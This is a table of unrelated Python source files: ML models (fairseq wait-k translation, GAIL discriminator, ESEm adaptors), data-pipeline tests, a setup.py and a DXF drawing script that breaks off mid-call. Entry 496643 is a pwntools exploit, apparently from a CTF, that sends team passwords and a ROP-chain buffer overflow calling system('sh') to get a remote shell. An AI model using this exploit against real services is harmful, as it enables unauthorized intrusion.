id | content |
---|---|
496597 | import torch
from rlil.nn import RLNetwork
from .approximation import Approximation
class Discriminator(Approximation):
def __init__(
self,
model,
optimizer,
name='discriminator',
**kwargs
):
model = DiscriminatorModule(model)
super().__init__(
model,
optimizer,
name=name,
**kwargs
)
def expert_reward(self, features):
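        # Adversarial-imitation-style reward log D(x) - log(1 - D(x)), i.e. the
        # discriminator logit; it is detached below so no gradient flows back
        # through the discriminator when the value is used as a reward.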
        d = self.model(features)
        rew = torch.log(d) - torch.log(1 - d)
return rew.squeeze().detach()
class DiscriminatorModule(RLNetwork):
def forward(self, features):
return self.model(features)
|
496609 | import tensorflow as tf
from .math import sparse_tensor_diag_matmul, sparse_scalar_multiply
def rescaled_laplacian(adj):
"""Creates a tensorflow (rescale) laplacian matrix out of a
SparseTensorValue adjacency matrix."""
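    # This computes -D^{-1/2} A D^{-1/2}: with the normalized Laplacian
    # L = I - D^{-1/2} A D^{-1/2} and lambda_max taken as 2, the rescaled
    # Laplacian 2 L / lambda_max - I reduces to exactly this expression.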
degree = tf.sparse_reduce_sum(adj, axis=1)
degree = tf.cast(degree, tf.float32)
degree = tf.pow(degree, -0.5)
lap = sparse_tensor_diag_matmul(adj, degree, transpose=True)
lap = sparse_tensor_diag_matmul(lap, degree, transpose=False)
return sparse_scalar_multiply(lap, -1)
|
496617 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import utils
from fairseq.models import (
    FairseqEncoderDecoderModel, FairseqEncoder, FairseqIncrementalDecoder,
    register_model, register_model_architecture,
)
from examples.pervasive.module import (
build_convnet, build_aggregator,
)
from fairseq.modules import (
SinusoidalPositionalEmbedding,
LearnedPositionalEmbedding,
)
@register_model('attn2d_waitk')
class Attn2dWaitkModel(FairseqEncoderDecoderModel):
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
def get_lenx(self, encoder_out):
return encoder_out['encoder_out'].size(1)
@staticmethod
def add_args(parser):
""" Add model-specific arguments to the parser. """
""" Embeddings """
parser.add_argument('--pooling-policy', type=str, default='row',
help='Policy for pooling the grid')
parser.add_argument('--skip-output-mapping', action='store_true',
help='remove the final mapping if equal dimension')
parser.add_argument('--share-all-embeddings', action='store_true',
help='share encoder, decoder and output embeddings'
' (requires shared dictionary and embed dim)')
parser.add_argument('--share-decoder-input-output-embed', action='store_true',
help='share decoder input and output embeddings')
parser.add_argument('--add-positional-embeddings', default=False, action='store_true',
help='if set, enables positional embeddings')
parser.add_argument('--learned-pos', action='store_true',
help='use learned positional embeddings')
parser.add_argument('--encoder-embed-path', type=str, metavar='STR',
help='path to pre-trained encoder embedding')
parser.add_argument('--decoder-embed-path', type=str, metavar='STR',
help='path to pre-trained decoder embedding')
parser.add_argument('--encoder-embed-dim', type=int, metavar='N',
help='encoder embedding dimension')
parser.add_argument('--decoder-embed-dim', type=int, metavar='N',
help='decoder embedding dimension')
parser.add_argument('--ffn-dim', type=int,
help='ffn dimension')
parser.add_argument('--reduce-dim', type=int,
help='first conv output dimension')
parser.add_argument('--double-masked', action='store_true',
help='Mask the future source as well')
parser.add_argument('--conv-groups', type=int,
help='convolution groups')
parser.add_argument('--source-dilation', default=1, type=int,
help='2nd dimension dilation')
parser.add_argument('--target-dilation', default=1, type=int,
help='1st dimension dilation')
parser.add_argument('--conv-stride', default=1, type=int,
help='2nd dimension stride')
parser.add_argument('--maintain-resolution', default=1, type=int,
help='pad so that the output dimension matches the input')
parser.add_argument('--output-dim', type=int,
help='pre-softmax output dimension')
parser.add_argument('--embeddings-ln', action='store_true',
help='add LN after the embeddings')
parser.add_argument('--network', type=str, metavar='STR',
help='Type of cnv net between denseNet or resNet')
parser.add_argument('--blocks', type=str, metavar='STR',
help='specific architecture that overwrites the kernel, growth...')
parser.add_argument('--kernel-size', type=int,
help='kernel size')
parser.add_argument('--bn-size', type=int,
help='bn size in the dense layer')
parser.add_argument('--growth-rate', type=int,
help='growth rate')
parser.add_argument('--num-layers', type=int,
help='number of layers')
parser.add_argument('--convolution-dropout', type=float, metavar='D',
help='dropout probability in the conv layers')
parser.add_argument('--input-dropout', type=float, metavar='D',
help='dropout probability on the initial 2d input')
parser.add_argument('--embeddings-dropout', type=float, metavar='D',
help='dropout probability on the embeddings')
parser.add_argument('--prediction-dropout', type=float, metavar='D',
help='dropout on the final prediction layer')
        parser.add_argument('--init-weights', type=str, metavar='STR',
                            help='the type of weight initialization')
parser.add_argument('--divide-channels', type=int, metavar='INT',
help='the factor to reduce the input channels by')
parser.add_argument('--skip-last-trans', type=bool,
help='whether to transition at the last layer')
parser.add_argument('--memory-efficient', action='store_true',
help='use checkpointing')
parser.add_argument('--trans-norm', type=bool,
help='transition batch norm')
parser.add_argument('--final-norm', type=bool,
help='final batch norm')
parser.add_argument('--layer1-norm', type=bool,
help='first layer batch norm')
parser.add_argument('--layer2-norm', type=bool,
help='second layer batch norm')
parser.add_argument('--initial-shift', type=int, default=3,
help='Initial shift')
parser.add_argument('--read-normalization', type=str, default='max',
help='Normalization of the read/write proba from the softmax over the full vocabulary')
        parser.add_argument('--waitk-policy', type=str, default='path',
                            help='The type of fixed policy with fixed marginals')
parser.add_argument('--waitk', type=int, default=3,
help='Fixed policy shift')
parser.add_argument('--waitk-delta', type=int, default=1,
help='Fixed policy stepsize')
parser.add_argument('--waitk-catchup', type=int, default=1,
help='Fixed policy catchup')
def log_tensorboard(self, writer, iter):
pass
@classmethod
def build_model(cls, args, task):
""" Build a new model instance. """
base_architecture(args)
if not hasattr(args, 'max_source_positions'):
args.max_source_positions = 1024
if not hasattr(args, 'max_target_positions'):
args.max_target_positions = 1024
src_dict, tgt_dict = task.source_dictionary, task.target_dictionary
def build_embedding(dictionary, embed_dim, path=None):
num_embeddings = len(dictionary)
padding_idx = dictionary.pad()
emb = Embedding(num_embeddings, embed_dim, padding_idx)
# if provided, load from preloaded dictionaries
if path:
embed_dict = utils.parse_embedding(path)
utils.load_embedding(embed_dict, dictionary, emb)
return emb
if args.share_all_embeddings:
if src_dict != tgt_dict:
raise RuntimeError('--share-all-embeddings requires a joined dictionary')
if args.encoder_embed_dim != args.decoder_embed_dim:
raise RuntimeError(
'--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim')
if args.decoder_embed_path and (
args.decoder_embed_path != args.encoder_embed_path):
raise RuntimeError('--share-all-embeddings not compatible with --decoder-embed-path')
encoder_embed_tokens = build_embedding(
src_dict, args.encoder_embed_dim, args.encoder_embed_path
)
decoder_embed_tokens = encoder_embed_tokens
args.share_decoder_input_output_embed = True
else:
encoder_embed_tokens = build_embedding(
src_dict, args.encoder_embed_dim, args.encoder_embed_path
)
decoder_embed_tokens = build_embedding(
tgt_dict, args.decoder_embed_dim, args.decoder_embed_path
)
encoder = Attn2dEncoder(args, src_dict, encoder_embed_tokens)
decoder = Attn2dDecoder(args, tgt_dict, decoder_embed_tokens)
return cls(encoder, decoder)
def max_decoder_positions(self):
""" Maximum input length supported by the decoder """
return self.decoder.max_target_positions
class Attn2dEncoder(FairseqEncoder):
def __init__(self, args, dictionary, embed_tokens, left_pad=False):
super().__init__(dictionary)
embed_dim = embed_tokens.embedding_dim
self.padding_idx = embed_tokens.padding_idx
self.max_source_positions = args.max_source_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = PositionalEmbedding(
self.max_source_positions, embed_dim, self.padding_idx,
left_pad=left_pad,
learned=args.learned_pos,
) if args.add_positional_embeddings else None
self.ln = lambda x: x
if args.embeddings_ln:
self.ln = nn.LayerNorm(embed_dim, elementwise_affine=True)
self.embedding_dropout = nn.Dropout(args.embeddings_dropout)
def forward(self, src_tokens, src_lengths=None, **kwargs):
x = self.embed_scale * self.embed_tokens(src_tokens)
if self.embed_positions is not None:
x += self.embed_positions(src_tokens)
x = self.ln(x)
x = self.embedding_dropout(x)
encoder_padding_mask = src_tokens.eq(self.padding_idx)
return {
            'encoder_out': x,  # B, Ts, C
            'encoder_padding_mask': encoder_padding_mask  # B, Ts
}
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
def reorder_encoder_out(self, encoder_out, new_order):
"""
Reorder encoder output according to *new_order*.
Args:
encoder_out: output from the ``forward()`` method
new_order (LongTensor): desired order
Returns:
*encoder_out* rearranged according to *new_order*
"""
if encoder_out['encoder_out'] is not None:
encoder_out['encoder_out'] = \
encoder_out['encoder_out'].index_select(0, new_order)
if encoder_out['encoder_padding_mask'] is not None:
encoder_out['encoder_padding_mask'] = \
encoder_out['encoder_padding_mask'].index_select(0, new_order)
return encoder_out
class Attn2dDecoder(FairseqIncrementalDecoder):
""" Pervasive Attention Model """
def __init__(self, args, dictionary, embed_tokens, left_pad=False):
super().__init__(dictionary)
self.share_input_output_embed = args.share_decoder_input_output_embed
embed_dim = embed_tokens.embedding_dim
self.padding_idx = embed_tokens.padding_idx
self.eos = dictionary.eos()
self.max_target_positions = args.max_target_positions
self.embed_tokens = embed_tokens
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = PositionalEmbedding(
args.max_target_positions, embed_dim, self.padding_idx,
left_pad=False,
learned=args.learned_pos,
) if args.add_positional_embeddings else None
self.ln = lambda x: x
if args.embeddings_ln:
self.ln = nn.LayerNorm(embed_dim, elementwise_affine=True)
self.embedding_dropout = nn.Dropout(args.embeddings_dropout)
self.input_dropout = nn.Dropout(args.input_dropout)
self.input_channels = args.encoder_embed_dim + args.decoder_embed_dim
self.output_dim = args.output_dim
self.kernel_size = args.kernel_size
print('Input channels:', self.input_channels)
        # build_convnet dispatches on args.network (densenet / resnet variants);
        # the former per-class branches referenced modules that are not imported here.
        self.net = build_convnet(args)
self.output_channels = self.net.output_channels
print('Output channels:', self.output_channels)
self.decoder_dim = args.decoder_embed_dim
if args.pooling_policy == 'row':
self.pool_and_select_context = RowPool(args)
else:
raise ValueError('Unknown pooling strategy %s' % args.pooling_policy)
        if self.output_dim != self.decoder_dim or not args.skip_output_mapping:
            self.projection = Linear(self.decoder_dim, self.output_dim,
                                     dropout=args.prediction_dropout)
else:
self.projection = None
print('Projection layer:', self.projection)
        self.prediction_dropout = nn.Dropout(args.prediction_dropout)
        self.vocab_size = len(dictionary)
if self.share_input_output_embed:
self.prediction = Linear(self.decoder_dim, len(dictionary))
self.prediction.weight = self.embed_tokens.weight
else:
self.prediction = Linear(self.output_dim, len(dictionary))
def forward(self, prev_output_tokens, encoder_out, incremental_state=None,
context_size=None, cache_decoder=True,
**kwargs):
# source embeddings
src_emb = encoder_out['encoder_out'].clone() # N, Ts, ds
Ts = src_emb.size(1)
if context_size is not None:
if context_size < Ts:
# src_emb[:, context_size:] = 0
src_emb = src_emb.clone()[:, :context_size]
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=incremental_state if cache_decoder else None,
) if self.embed_positions is not None else None
if incremental_state is not None and cache_decoder:
# embed the last target token
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
x = self.net(x, incremental_state if cache_decoder else None) # N, Tt, Ts, C
if incremental_state is not None:
# Keep only the last step:
x = x[:, -1:]
# if context_size is not None and context_size < Ts:
# x, _ = x[:, :, :context_size].max(dim=2) # N, Tt, C
# else:
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, None
# Training:
# progressive pooling:
x = self.pool_and_select_context(x, encoder_out['encoder_padding_mask']) # N, Tt, k, C
if isinstance(x, torch.Tensor):
x = self.projection(x) if self.projection is not None else x # N, Tt, k, C
x = self.prediction_dropout(x)
x = self.prediction(x) # N, Tt, k, C
else:
x = [self.projection(sub) if self.projection is not None else sub
for sub in x] # N, Tt, k, C
x = [self.prediction_dropout(sub) for sub in x]
x = [self.prediction(sub) for sub in x] # list of (N, k, C ) * Tt
return x, None
def forward_one_with_update(self, prev_output_tokens, encoder_out, context_size,
incremental_state=None, **kwargs):
"""
Update the previously emitted tokens states
"""
# Truncate the encoder outputs:
encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]}
# source embeddings
src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=None,
) if self.embed_positions is not None else None
# limit to the used context:
# if incremental_state is not None:
# hist = min(prev_output_tokens.size(1), self.kernel_size // 2)
# prev_output_tokens = prev_output_tokens#[:, -hist:]
# if positions is not None:
# positions = positions#[:, -hist:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
# Limit to the used context:
x = self.net(x) # N, Tt, Ts, C
# Only the last step:
x = x[:, -1:]
# aggregate predictions and project into embedding space
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, {'attn': None}
def forward_one(self, prev_output_tokens, encoder_out, context_size,
incremental_state=None, **kwargs):
"""
        Keep the previously emitted tokens' states as-is
"""
# Truncate the encoder outputs:
encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]}
# source embeddings
src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=incremental_state,
) if self.embed_positions is not None else None
if incremental_state is not None:
# embed the last target token
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
x = self.net(x, incremental_state) # N, Tt, Ts, C
# aggregate predictions and project into embedding space
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, {'attn': None}
def forward_one_old(self, prev_output_tokens, encoder_out, context_size,
incremental_state=None, **kwargs):
# Truncate the encoder outputs:
encoder_out_truncated = {'encoder_out': encoder_out['encoder_out'].clone()[:,:context_size]}
# source embeddings
src_emb = encoder_out_truncated['encoder_out'] # N, Ts, ds
# target embeddings:
positions = self.embed_positions(
prev_output_tokens,
incremental_state=incremental_state,
) if self.embed_positions is not None else None
if incremental_state is not None:
# embed the last target token
prev_output_tokens = prev_output_tokens[:, -1:]
if positions is not None:
positions = positions[:, -1:]
# Build the full grid
tgt_emb = self.embed_scale * self.embed_tokens(prev_output_tokens)
if positions is not None:
tgt_emb += positions
tgt_emb = self.ln(tgt_emb)
tgt_emb = self.embedding_dropout(tgt_emb)
src_length = src_emb.size(1)
tgt_length = tgt_emb.size(1)
# build 2d "image" of embeddings
src_emb = _expand(src_emb, 1, tgt_length) # N, Tt, Ts, ds
tgt_emb = _expand(tgt_emb, 2, src_length) # N, Tt, Ts, dt
x = torch.cat((src_emb, tgt_emb), dim=3) # N, Tt, Ts, C=ds+dt
x = self.input_dropout(x)
# pass through dense convolutional layers
x = self.net(x, incremental_state) # N, Tt, Ts, C
# progressive pooling:
# x = self.pool(x, encoder_out['encoder_padding_mask']) # B x C x Tt x Ts
x, _ = x.max(dim=2) # N, Tt, C
x = self.projection(x) if self.projection is not None else x # N, Tt, C
x = self.prediction_dropout(x)
# multiply by embedding matrix to generate distribution
x = self.prediction(x) # N, Tt, V
return x, {'attn': None}
@register_model_architecture('attn2d_waitk', 'attn2d_waitk')
def base_architecture(args):
args.memory_efficient = getattr(args, 'memory_efficient', False)
args.skip_output_mapping = getattr(args, 'skip_output_mapping', False)
args.encoder_embed_path = getattr(args, 'encoder_embed_path', None)
args.decoder_embed_path = getattr(args, 'decoder_embed_path', None)
args.share_decoder_input_output_embed = getattr(
args, 'share_decoder_input_output_embed', False
)
args.share_all_embeddings = getattr(args, 'share_all_embeddings', False)
args.embeddings_dropout = getattr(args, 'embeddings_dropout', 0.)
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 256)
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 256)
args.ffn_dim = getattr(args, 'ffn_dim', 512)
args.output_dim = getattr(args, 'output_dim', args.decoder_embed_dim)
args.divide_channels = getattr(args, 'divide_channels', 2)
args.reduce_dim = getattr(args, 'reduce_dim',
(args.encoder_embed_dim + args.decoder_embed_dim) // args.divide_channels)
args.conv_groups = getattr(args, 'conv_groups', args.reduce_dim)
args.conv_stride = getattr(args, 'conv_stride', 1)
args.source_dilation = getattr(args, 'source_dilation', 1)
args.target_dilation = getattr(args, 'target_dilation', 1)
args.maintain_resolution = getattr(args, 'maintain_resolution', 1)
    args.add_positional_embeddings = getattr(args, 'add_positional_embeddings', False)
args.learned_pos = getattr(args, 'learned_pos', False)
args.embeddings_ln = getattr(args, 'embeddings_ln', False)
args.input_dropout = getattr(args, 'input_dropout', 0.2)
args.convolution_dropout = getattr(args, 'convolution_dropout', 0.2)
args.network = getattr(args, 'network', 'densenet')
args.kernel_size = getattr(args, 'kernel_size', 3)
args.num_layers = getattr(args, 'num_layers', 24)
args.divide_channels = getattr(args, 'divide_channels', 2)
args.prediction_dropout = getattr(args, 'prediction_dropout', 0.2)
args.double_masked = getattr(args, 'double_masked', True)
def _expand(tensor, dim, reps):
tensor = tensor.unsqueeze(dim)
shape = tuple(reps if i == dim else -1 for i in range(tensor.dim()))
return tensor.expand(shape)
def PositionalEmbedding(num_embeddings, embedding_dim,
padding_idx, left_pad, learned=False):
if learned:
m = LearnedPositionalEmbedding(num_embeddings + padding_idx + 1,
embedding_dim, padding_idx, left_pad)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
else:
m = SinusoidalPositionalEmbedding(embedding_dim, padding_idx, left_pad,
num_embeddings + padding_idx + 1)
return m
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, dropout=0., bias=True):
m = nn.Linear(in_features, out_features, bias=bias)
nn.init.normal_(m.weight, mean=0,
std=math.sqrt((1 - dropout) / in_features))
nn.init.constant_(m.bias, 0)
return m
class RowPool(nn.Module):
"""
Pool the row features
input shape N, Tt, Ts, C
"""
def __init__(self, args):
super(RowPool, self).__init__()
self.policy = args.waitk_policy
self.waitk = args.waitk
self.delta = args.waitk_delta
self.catchup = args.waitk_catchup
def forward(self, X, src_mask=None):
if self.policy == 'path':
return self.forward_path(X)
if self.policy == 'above':
return self.forward_above(X)
def forward_path(self, X):
N, Tt, Ts, C = X.size()
XpoolSelect = []
for t in range(Tt):
ctx = min((t // self.catchup * self.delta) + self.waitk, Ts)
feat, _ = torch.max(X[:, t:t+1, :ctx], dim=2, keepdim=True)
XpoolSelect.append(feat)
return torch.cat(XpoolSelect, dim=1)
def forward_above(self, X):
N, Tt, Ts, C = X.size()
XpoolSelect = []
for t in range(Tt):
ctx = min((t // self.catchup * self.delta) + self.waitk, Ts)
tfeats = []
for ctxplus in range(ctx, Ts+1):
feat, _ = torch.max(X[:, t, :ctxplus], dim=1, keepdim=True)
tfeats.append(feat)
feat = torch.cat(tfeats, dim=1)
XpoolSelect.append(feat)
return XpoolSelect
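# Sanity check of the wait-k context schedule used above (values are the argparse
# defaults waitk=3, delta=1, catchup=1; Ts=10 is made up):
#   ctx(t) = min(t // catchup * delta + waitk, Ts)
#   -> 3, 4, 5, 6, 7, 8, 9, 10, 10, ... i.e. read waitk source tokens before the
#   first write, then advance one source token per target step, capped at Ts.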
|
496643 | from pwn import *
import sys
team = int(sys.argv[2])
p = remote(sys.argv[1], 5000 + team)
greeting = 0x493018
pop_x19 = 0x400790
mov_x0_x19 = 0x400788
system = 0x400e38
fill = 0x4141414141414141
if team == 0:
p.send("letmeinplz\n")
elif team == 1:
p.send("letmein181\n")
elif team == 2:
p.send("letmein244\n")
elif team == 3:
p.send("letmein364\n")
elif team == 4:
p.send("letmein474\n")
rop = p64(pop_x19) + "A"*0x100
rop += p64(fill) + p64(mov_x0_x19) + p64(greeting) + p64(fill) + p64(fill) + p64(fill) + p64(fill) + "A"*0x68
rop += p64(fill) + p64(system)
cmd = "sh\x00"
payload = cmd + "A" * (0x110 - len(cmd)) + rop
while len(payload) > 0:
p.send("3\n")
p.send(payload.replace('\x00', 'A') + "\n")
zero = payload.rfind('\x00')
if zero == -1:
break
payload = payload[0:zero]
p.send("5\n")
p.interactive()
|
496652 | import pathlib
import pandas as pd
import pytest
from airflow.decorators import task
from astro import sql as aql
from astro.files import File
from astro.sql.operators.sql_decorator_legacy import transform_decorator as transform
from astro.sql.table import Table
from tests.sql.operators import utils as test_utils
cwd = pathlib.Path(__file__).parent
@pytest.mark.parametrize(
"sql_server",
[
"snowflake",
"postgres",
"bigquery",
"sqlite",
],
indirect=True,
)
def test_dataframe_transform(sql_server, sample_dag, test_table):
print("test_dataframe_to_database")
@aql.dataframe
def get_dataframe():
return pd.DataFrame({"numbers": [1, 2, 3], "colors": ["red", "white", "blue"]})
@transform
def sample_pg(input_table: Table):
return "SELECT * FROM {{input_table}}"
@aql.dataframe
def validate_dataframe(df: pd.DataFrame):
df.columns = df.columns.str.lower()
df = df.sort_values(by=df.columns.tolist()).reset_index(drop=True)
assert df.equals(
pd.DataFrame({"numbers": [1, 2, 3], "colors": ["red", "white", "blue"]})
)
with sample_dag:
my_df = get_dataframe(output_table=test_table)
pg_df = sample_pg(my_df)
validate_dataframe(pg_df)
test_utils.run_dag(sample_dag)
@pytest.mark.parametrize(
"sql_server",
[
"snowflake",
"postgres",
"bigquery",
"sqlite",
],
indirect=True,
)
def test_transform(sql_server, sample_dag, test_table):
@transform
def sample_function(input_table: Table):
return "SELECT * FROM {{input_table}} LIMIT 10"
@aql.dataframe
def validate_table(df: pd.DataFrame):
assert len(df) == 10
with sample_dag:
homes_file = aql.load_file(
input_file=File(path=str(cwd) + "/../../../data/homes.csv"),
output_table=test_table,
)
first_model = sample_function(
input_table=homes_file,
)
inherit_model = sample_function(
input_table=first_model,
)
validate_table(inherit_model)
test_utils.run_dag(sample_dag)
@pytest.mark.parametrize(
"sql_server",
[
"snowflake",
"postgres",
"bigquery",
"sqlite",
],
indirect=True,
)
def test_raw_sql(sql_server, sample_dag, test_table):
@transform(raw_sql=True)
def raw_sql_query(my_input_table: Table, created_table: Table, num_rows: int):
return "SELECT * FROM {{my_input_table}} LIMIT {{num_rows}}"
@task
def validate_raw_sql(cur):
print(cur)
with sample_dag:
homes_file = aql.load_file(
input_file=File(path=str(cwd) + "/../../../data/homes.csv"),
output_table=test_table,
)
raw_sql_result = (
raw_sql_query(
my_input_table=homes_file,
created_table=test_table,
num_rows=5,
handler=lambda cur: cur.fetchall(),
),
)
validate_raw_sql(raw_sql_result)
test_utils.run_dag(sample_dag)
|
496655 | from abc import ABC, abstractmethod
class ModelAdaptor(ABC):
"""
Provides a unified interface for all emulation engines within ESEm.
Concrete classes must implement both :meth:`train` and :meth:`predict` methods.
See the `API documentation <../api.html#dataprocessor>`_ for a list of concrete
classes implementing this interface.
"""
def __init__(self, model):
self.model = model
@abstractmethod
def train(self, training_params, training_data, verbose=False, **kwargs):
"""
Train on the training data
:return:
"""
@abstractmethod
def predict(self, *args, **kwargs):
"""
This is either the tf model which can be called directly, or a generator over the model.predict (in tf,
so it's quick).
:return:
"""
class SKLearnModel(ModelAdaptor):
"""
A wrapper around `scikit-learn <https://scikit-learn.org>`_ models.
"""
def train(self, training_params, training_data, verbose=False, **kwargs):
"""
Train the RF model. Note that this scikit
implementation can't take advantage of GPUs.
"""
if verbose:
self.model.verbose = 1
self.model.fit(X=training_params, y=training_data, **kwargs)
def predict(self, *args, **kwargs):
# Requires X_pred to be of shape (n_samples, n_features)
return self.model.predict(*args, **kwargs), None
class KerasModel(ModelAdaptor):
"""
A wrapper around `Keras <https://keras.io/>`_ models
"""
def train(self, training_params, training_data, verbose=False, epochs=100, batch_size=8, validation_split=0.2, **kwargs):
"""
Train the Keras model.
        :param training_params: training inputs
        :param training_data: training targets
:param verbose:
:param epochs:
:param batch_size:
:param float validation_split: The proportion of training data to use for validation
:return:
"""
self.model.fit(training_params, training_data,
batch_size=batch_size, epochs=epochs,
validation_split=validation_split, **kwargs)
def predict(self, *args, **kwargs):
# This only works with the tf.keras API
return self.model(*args, **kwargs), None
class GPFlowModel(ModelAdaptor):
"""
A wrapper around `GPFlow <https://gpflow.readthedocs.io/en/master/#>`_ regression models
"""
def train(self, training_params, training_data, verbose=False, maxiter=100, **kwargs):
import gpflow
# Uses L-BFGS-B by default
opt = gpflow.optimizers.Scipy()
opt.minimize(self.model.training_loss,
variables=self.model.trainable_variables,
options=dict(disp=verbose, maxiter=maxiter), **kwargs)
def predict(self, *args, **kwargs):
return self.model.predict_y(*args, **kwargs)
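# Minimal usage sketch (illustrative, not part of this module): wrapping a
# scikit-learn regressor with SKLearnModel; the estimator and toy arrays are made up.
#
#   from sklearn.ensemble import RandomForestRegressor
#   import numpy as np
#
#   adaptor = SKLearnModel(RandomForestRegressor(n_estimators=10))
#   adaptor.train(np.random.rand(20, 3), np.random.rand(20))
#   predictions, _ = adaptor.predict(np.random.rand(5, 3))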
|
496715 | import unittest
from katas.kyu_7.a_rule_of_divisibility_by_13 import thirt
class ThirtTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(thirt(1234567), 87)
def test_equals_2(self):
self.assertEqual(thirt(321), 48)
def test_equals_3(self):
self.assertEqual(thirt(8529), 79)
def test_equals_4(self):
self.assertEqual(thirt(85299258), 31)
def test_equals_5(self):
self.assertEqual(thirt(5634), 57)
def test_equals_6(self):
self.assertEqual(thirt(1111111111), 71)
def test_equals_7(self):
self.assertEqual(thirt(987654321), 30)
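# For reference, a minimal sketch of the algorithm these tests exercise (the standard
# "rule of divisibility by 13" kata); this is an illustration, not the module under test:
# multiply the digits, right to left, by the repeating sequence 1, 10, 9, 12, 3, 4,
# sum the products, and iterate until the value is stationary.
#
#   def thirt(n):
#       seq = [1, 10, 9, 12, 3, 4]
#       while True:
#           total = sum(int(d) * seq[i % 6]
#                       for i, d in enumerate(str(n)[::-1]))
#           if total == n:
#               return total
#           n = total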
|
496742 | import os
import re
import ast
from setuptools import setup
import PySignal
with open('PySignal.py', 'rb') as f:
contents = f.read().decode('utf-8')
def parse(pattern):
return re.search(pattern, contents).group(1).replace('"', '').strip()
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
version = parse(r'__version__\s+=\s+(.*)')
author = parse(r'__author__\s+=\s+(.*)')
email = parse(r'__email__\s+=\s+(.*)')
classifiers = [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.5",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities"
]
setup(
name="PySignal",
version=version,
description="Python Signal Library to mimic the Qt Signal system for event driven connections",
author=author,
author_email=email,
url="https://github.com/dgovil/PySignal",
license="MIT",
zip_safe=False,
py_modules=["PySignal"],
classifiers=classifiers,
keywords=['signals', 'qt', 'events']
)
|
496768 | import ezdxf
"""Começa configuração do desenho."""
# Cria um novo desenho
dwg = ezdxf.new(dxfversion='AC1032')
# Get the drawing's modelspace layout
msp = dwg.modelspace()
"""Adiciona elementos ao layout."""
# Adiciona um traço no layout
msp.add_line(start=(5, 0), end=(5, 10))
# Add a rectangle
retangulo = [(-20, 0), (0, 0), (0, 10), (-20, 10)]
msp.add_lwpolyline(
points=retangulo,
dxfattribs={'closed': True}
)
# Add a triangle
triangulo = [(50, -20), (90, -20), (70, 0)]
msp.add_lwpolyline(points=triangulo)
# Add a circle
msp.add_circle(center=(-10, -50), radius=20.5)
# Add a text entity
msp.add_text(
